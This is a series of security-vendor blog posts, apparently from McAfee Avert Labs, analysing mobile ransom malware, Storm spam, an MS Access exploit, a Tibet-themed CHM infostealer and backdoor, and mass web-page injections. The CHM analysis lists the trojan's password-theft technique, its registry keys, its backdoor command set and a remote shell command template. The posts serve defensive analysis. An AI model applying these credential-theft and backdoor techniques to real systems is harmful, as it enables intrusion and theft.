A week after Mcafee Avert Labs found WinCE/InfoJack, we’ve run across more malware in China. This time the malware, running on Symbian Series 60 phones, attempts to extort money from users. SymbOS/Kiazha.A displays a message telling the user to send RMB 50 (approx. $7) to the malware author in order to regain use of the phone.

The warning message is displayed after a delay

The message roughly translated states:
“Warning: Your device has been affected, please prepare a recharge card of RMB 50 yuan and connect QQ[id removed] account , or your phone will be paralysed!!!”

QQ is a very popular Instant Messaging network in China and a target for many password stealing trojans and scams. QQ coins, an in-network currency, are also heavily used, traded and stolen outside the QQ network. We’ve covered how theft of QQ coins is prosecuted in the past.

SymbOS/Kiazha.A is just one part of SymbOS/MultDropper.CR. MultiDroppers contain a number of different malware, which have separate functionality. SymbOS/MultDropper.CR consists of SymbOS/Commwarrior.C, SymbOS/Beselo.B1, and SymbOS/SmsSend.F-G, all of which can cost the user for SMS and MMS transmission.

On the surface SymbOS/MultDropper.CR looks like a standard collection of previously seen malware. While examining the MultDropper’s components individually, we noticed a few things:

• SymbOS/SmsSend.F sends an SMS to request a new QQ account for the user
• SymbOS/SmsSend.G forwards SMS received to the malware author
• SymbOS/Kiazha.A deletes any sent or received SMS message

Separately these actions seemed in opposition to each other. If the new account SMS were received, it would be deleted by SymbOS/Kiazha.A rendering the initial action moot.

Further testing with the entire malware showed something more interesting. The interaction of these disparate malware produced a functional malware. SymbOS/MultDropper.CR uses malicious payloads (Beselo,Commwarrior) to convince the user their phone is infected. It also sets up SMS forwarding (SmsSend.G) to collect information and potentially passwords. In case the victim doesn’t have a QQ account the malware will order (SmsSend.F) one for them. After all that, SymbOS/Kiazha.A deletes SMS messages to cover its tracks and displays the offer to fix the user’s phone for a small fee.

The interesting thing about MultiDroppers is that usually they’re compiled by malware authors who aren’t programmers and simply collect the work of others. With MultiDropper.CR it appears that the author, with a lot of effort and testing, put together various malware like pieces from a toolkit. Also of note, especially with mobile phone malware, is that the author may have put in all this work to make a profit rather than increase his notoriety.

After a series of holiday related campaigns, Nuwar (a.k.a. Storm) is back to its ecard routine. E-mails promising funny ecards are being spammed all over the Internet. The usual http://numeric-IP/ links inside lead to a page like this:

A click on the picture leads to postcard.exe download, a click on the “click here” - to e-card.exe download. If nothing is clicked, in five seconds ecard.exe download is started automatically. Needless to say, all of the files are Nuwar.

There was recently an article discussing a talk given by Gene Hodges, on the sociological changes in the virus-writer scene. On the one hand, I think the concept is correct, there has been a very large shift in the sociological motivation behind authoring malware. One of the two conclusions he’s drawn, however, is contrary to facts.

You may recall from the other day’s blog entry that 17 people between the ages of 17 and 26 were arrested in Canada. Earlier that week another person “under the age of 18″ was arrested for botnet-related activity. I don’t imagine that even teenagers who’re making so much money on botnets would be homeowners, as Hodges suggested.

It seems to me that kids are still what make the malware world go round - many seem to feel invincible, as if the law can’t touch them. Or perhaps they just “don’t know better”. These are kids who’ve grown up with technology, so cybercrime may seem as easy as taking candy from a baby. And there is still very little risk for them in these crimes. There’s few prosecutions compared to the total number of individuals perpetrating these crimes, and these kids have no property or reputation to lose. A married adult with a mortgage, like the ones Hodges describes, might be concerned about losing a house which they and a spouse are living in. A teenager, on the other hand, would be highly unlikely to have property in their name which could be confiscated.

In short, the stereotype of the kid in his parent’s basement still holds. But now maybe they can afford some flashy duds to attract the ladies when they’re not holed up in the basement stealing your data.

Microsoft’s OneCare team issued an update on January 31, 2008 that resulted in SiteAdvisor users receiving a Microsoft warning message recommending that SiteAdvisor be removed due to interference with OneCare.

SiteAdvisor doesn’t interfere with OneCare in any way; we communicated this to Microsoft and they’ve begun to resolve the issue.

As of February 21st, new installations of OneCare will not message against SiteAdvisor. However, existing users of OneCare will continue to receive these messages until sometime in the spring, when Microsoft says it will fix OneCare installations made prior to February 21.

Turns out that as a general rule, Microsoft recommends running only one security application at a time because of potential performance and “PC stability” issues. We explained to Microsoft that SiteAdvisor functionality is totally unrelated to OneCare. They agreed.

Rest assured, there is no need to disable SiteAdvisor or OneCare. The two products co-exist nicely (aside from the pop-up!).

Because OneCare doesn’t allow white listing of applications, affected consumers have limited options until all installations of OneCare are patched. Thanks for your patience during this time.

Recently our friends from Pandalabs published a weblog, stating there is a new Microsoft access exploit found in the wild. We initiated some research on this exploit and found it actually targets an older well known vulnerability, CVE-2005-0944, found by the hexview team in March 2005. It’s very easy to exploit this vulnerability. We had observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so a specific patch for this vulnerability has not been released since it was made public 3 years ago.

The interesting thing about this vulnerability is that it happens in msjet40.dll, which was never updated on a Windows XP SP2 since the release of MS04-014 (for other platforms, please check out http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of MS JET 4.0 engine package. So for XP SP2 users the trojan gets executed in almost all cases no matter whichever version of Office XP and 2003 you are using. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune to this vulnerability.

McAfee AV detects this recent exploit via DAT 5236 which was released February 22 and our IntruShield NIPS sensors can detect and block this by our generic protection signatures for MS Access “HTTP: Microsoft Jet DB Engine Buffer Overflow” released on November 13, 2007.

Since Microsoft doesn’t patch Access-related vulnerabilities, we highly recommend Office users never open untrusted MDB files.

Recently, McAfee Avert Labs received a suspicious CHM file containing nineteen wonderful pictures from a National Geographic article by Tolstoy Ilia, titled “Across Tibet from India to China”. Other security companies seem fascinated by these pictures too.

Interestingly, we received another suspicious CHM file a week earlier, also containing some images related to Tibet, and more specifically about Tsering Chungtak who was crowned Miss Tibet 2006!

(Just to clarify: a CHM file is a compiled and compressed Microsoft HTML Help file that can contain formatted text but also documents, scripts and executable files.
When a CHM file is opened, the HTML Help viewer, called hh.exe and located in the Windows directory, extracts the compressed files and executes them, that’s why CHM files are sometimes used maliciously.)

As the two cases looked similar (both drop a file named music.exe; both contained pictures related to Tibet), I decided to investigate them further and… bingo, both are linked to the same remote servers and involve the same family of malware (Spy-Agent.cp), which is a multi-part trojan composed of a loader, an infostealer, a backdoor component and an update installer.

Actually the file “music.exe” is just the first part of the puzzle - the figure below represents the attack architecture:

Although the CHM file will stay on the infected machine, music.exe will be deleted either by avp.exe (1st variant of the trojan) or by conime.exe (2nd variant). These two executable files also control the DLL loading.

The file zipfldr.dll (named the same as the file used in Windows’ built-in ZIP handling) is the infostealer component that stores data in two different files: C36YKNy.dat and C36YKNz.dat.

The former contains logs of when the execution of the dll started and stopped, the hostname and IP address of the machine, and the intercepted keystrokes. However the keystrokes will be written into the other logfile too.

The latter contains various data from the machine:

• Microsoft Windows Version
• Windows Environment Strings
• MAC address
• List of the active processes, their PPID and PID
• Outlook Passwords
• Hotmail Passwords
• Deleted Outlook Account passwords
• IE Password-Protected sites passwords
• MSN Explorer Signup passwords
• IE AutoComplete Passwords
• IE Auto Complete Fields
• Cached passwords
• Keystrokes from the former logfile

These passwords are retrieved from the Protected Storage System Provider key and by enumerating the Protected Storage. To do that the malware doesn’t load pstorec.dll directly but instead copies the file to xactsrv.dll located alongside the two .dat. This newly created dll file is loaded and its exported function PStoreCreateInstance() is called, providing an instance of IPStore.

Additionally, the malware uses the WNetEnumCachedPasswords() function from MPR.dll to gather cached passwords – a common trait of infostealer Trojans!

Last but not least zipfldr.dll attempts to connect to a remote server chosen amongst a list of three IP addresses. If successful two further components are downloaded:

1. setup.dat
2. winzip.exe

The URL used doesn’t reference the executable files directly, moreover a server-side script receives a specific UID as the effective parameter. The parameter that means “let me get the other files please” is “DD01×51″.

As you can see below, the files are encoded in Base64 and they are enclosed between the tags “1401C4F9071401C4F92317″:

And as previously mentioned, the dll file is able to intercept keystrokes by installing a high-level keyboard hook (WH_KEYBOARD).

There is hardly anything to mention about winzip.exe (the malicious one, of course!): as it’s just an executable looking for new files to install and setup their required registry keys.

Setup.dat is the backdoor component. The control connection to the attacker’s machine is done by sending a HTTP request to the server-side script file again passing UID “DDF03”.

The remote server to contact is chosen from a list of ten hardcoded IP addresses and URLs, which are also stored in the following registry key:

[HKCU\Software\Kodak\Imaging\Etc\]
“host%d”=host_to_contact (where %d is a digit).

It’s worth mentioning that the list of hosts may be updated by the attacker at any time by using a specific command.

Other commands available during remote control also include:

• Hosts: to write a new host in the registry key quoted above.
• Shell: to get a shell on the victim’s machine… (cmd.exe /c %s >> %s)
• Quit: to close the backdoor. That results in the writing of the date and time in

[HKCU\Software\Kodak\Imaging\Etc\]
“Refresh”=local_date_and_time

• Some others include Netget, Netmget, Netmgetr, Netls, Netlsr, Regls, Reglsr, Ls, Lsr, Get, Mget, which are used to obtain various pieces of information about the victim’s registry, read directory contents, download files to the victim’s machine, or to retrieve their files!

The CHM files received were used in two targeted attacks, so this multi-part trojan is unlikely to be widely distributed, but I would not be surprised to find it for sale in underground forums…

Our detection includes all components of this malware as Spy-Agent.cp.dr!chm, Spy-Agent.cp.dr, Spy-Agent.cp.dll and Spy-Agent.cp, and of course we will still keep an eye out for similar attacks!!!

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

• MS06-014
• RealPlayer (ActiveX Control)
• Baofeng Storm (ActiveX Control)
• Xunlei Thunder DapPlayer (ActiveX Control)
• Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks were observed in the past; most notable the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, which was later connected with SQL injection as the method used by the attackers to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:

Example of browser title bar (censored)

McAfee’s designations for the various pieces of malware include:

• Downloader-BGX
• Exploit-RealPlay
• JS/Exploit-BO.gen
• VBS/Psyme

Analysis is ongoing.

Straight out of science fiction? Sounds like it, but it may be closer to reality than you would think.

Recently a bunch of researchers from the University of Washington and the University of Massachusetts, (plus a Harvard MD and a University of Washington Phd) were able to hack a pacemaker/defibrillator.

Think about this for a moment…they were able to make the device stop.

They released the report on their Web site dedicated to medical device security. Very interesting stuff.

Under the hood (so to speak – it was actually on a table) they found that they were able to connect to the device wirelessly, and cause it to shock on command and even to stop altogether. Almost secondary at this point, they were also able to glean sensitive patient information stored on the device.

Exploit scenario’s for this are better left to more deviant-minded individuals, but the net effect is obviously very serious. (When’s the last time your server went post-mortem – literally- from a flaw?)

So here’s the coolest part to the story:

They have examples of how to fix it! How many times have you seen a researcher release details of an exploit and not suggest how to fix it (aye, irresponsible disclosure)? They have taken account of the device designs (wireless transmission) and limitations (battery power) and have suggested ways that device makers could improve the security. Kudos to them! Hopefully this will spark a growing industry to make these devices safer.

One last thought here… would it not be surreal if a computer virus transcended the electronic world and actually infected a human being?

Yesterday we uncovered a newer mass hack affecting over 10,000 web pages.  That number has since doubled.  Today, I took a look at another recent mass attack, which was similar to those reported by Dancho Danchev, but reference a JS file rather than an IFRAME.  

The attack seems to have started more than a week ago, and nearly 200,000 web pages have been found to be compromised, most of which are running phpBB.  This contrasts yesterday’s attack in that the vast majority of those were active server pages (.ASP).  The ASP attacks are different than the phpBB ones in that the payload and method are quite different.  Various exploits are used in the ASP attacks, where the phpBB ones rely on social engineering. phpBB mass hacks have occurred in the past, including those done by the Perl/Santy.worm back in 2004.

Here’s a brief video demonstrating how the phpBB attack looks from the end user’s perspective.

I came across a report entitled “Security Economics and the Internal Market,” published on the Web site of the European Network and Information Security Agency (ENISA) by Ross Anderson, Rainer Böhme, Richard Clayton. and Tyler Moore. The authors are well-known academics and security experts in Europe.

The report is a staggering 114 pages long, gives us some light reading for the weekend (no, no), and makes some important recommendations for the creation of European Union regulations informed by information-security economics. But the research behind these recommendations may have relevance in any country or region. Two recommendations of note to vulnerability research types:

• “We recommend that the EU adopt a combination of early responsible vulnerability disclosure and vendor liability for unpatched software to speed the patch-development cycle.
• “We recommend security patches be offered for free, and that patches be kept separate from feature updates.”

Read the report for some in-depth analysis of security economics. Neat stuff indeed.